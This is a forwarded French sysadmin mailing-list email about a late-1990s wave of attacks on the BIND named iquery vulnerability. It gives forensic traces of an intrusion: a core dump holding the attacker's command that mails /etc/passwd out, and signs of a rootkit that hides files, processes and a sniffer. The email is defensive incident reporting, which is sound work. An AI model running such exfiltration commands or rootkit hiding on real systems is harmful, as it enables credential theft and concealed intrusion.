Pour votre information.
Laurent Julliard
Bonjour,
Je ne peux diffuser ceci sur l'adresse guilde a cause du 'begaiement'
de mon mail. Mais je pense que cette info concernant les attaques
sur named sur linux entre-autre est importante.
Nous l'avons subie egalement sur HP9000.
Patrick
Bonjour,
Toujours à propos de la vague d'attaque DNS/bind, voici des
informations que nous avons obtenues et qui pourront peut-être vous
être utile.
D'autre part, Claudine Médéric a déposé à l'URL
ftp://ftp.cict.fr/pub/unix/bind/
les versions déjà compilées pour Solaris2.5 et HPUX10.20 de named non
vulnérables à ces attaques (8.1.2).
Plusieurs scripts exploitant la faille iquery du DNS (CERT
98/043,CA-98.05) sont disponibles. L'un d'entre eux permet de scanner
un grand nombre d'@IP et de tester la vulnérabilité du DNS s'il y
tourne. S'il semble qu'aujourd'hui seuls les DNS tournant sur Linux
soient susceptibles d'être compromis (parce que le code le prévoit),
l'effet sur les autres DNS est de les rendre inactifs (crash).
Un fichier core est créé (dans le repertoire contenant les infos DNS
du site). Dans certains cas, on peut y trouver (vers la fin) la
commande qui a été passée au named.
Exemple :
# strings core | tail -50
23151
23151
/usr/share/lib/zoneinfo/MET
addr.arpa) conta
HLame server on '%s' (in '%s'?): %s%s
2.in-addr.arpa
/bin/sh
cat /etc/passwd | mail ncros@???
21740
/usr/sbin/in.named
DISPLAY=ncd-tx-pb.cict.fr:0.0
EDITOR=emacs
HOME=/users/sysmaint/pb
LOGNAME=pb
MANPATH=/usr/share/man:/usr/local/man:/usr/openwin/man
Un de nos DNS (Linux) a été compromis. Nous y avons trouvé les traces
suivantes (signalant l'installation du RootKit, qui permet de masquer
l'activité du pirate sur la machine).
[root@mtest /]# strings /bin/ls | grep dev
/dev/ptyr
[root@mtest /]# strings /bin/ps | grep pty
/dev/ptyp
[root@mtest /]# strings /usr/bin/pstree | grep pty
/dev/ptyp
[root@mtest /]# cat /dev/ptyp
2 lpv
Les fichiers /dev/pty[r|p|q] contiennent la liste des
fichiers|process|connexions_réseau a cacher.
Pour rechercher les infos sur une telle machine, il faut donc utiliser
un version sûre (sauvegarde) de nestat, ps, ... Pour les fichiers,
utiliser find ou ls ./ (dès qu'il y a un /, le masquage ne fonctionne
plus).
/usr/sbin/lpv est un sniffer, qui stocke ses infos dans ./tcp.log
Le rootkit est facilement paramètrable, donc les /dev/ptyp peuvent
changer de nom/place.
Merci à Laurent Facq (facq@???) pour ses infos.
--
===============================================================
| Equipe M.O.S.T. | http://most.hmg.inpg.fr |
| Patrick BEGOU | ------------ |
| LEGI | mailto:Patrick.Begou@hmg.inpg.fr |
| BP 53 X | Tel 04 76 82 51 35 |
| 38041 GRENOBLE CEDEX | Fax 04 76 82 52 71 |
===============================================================
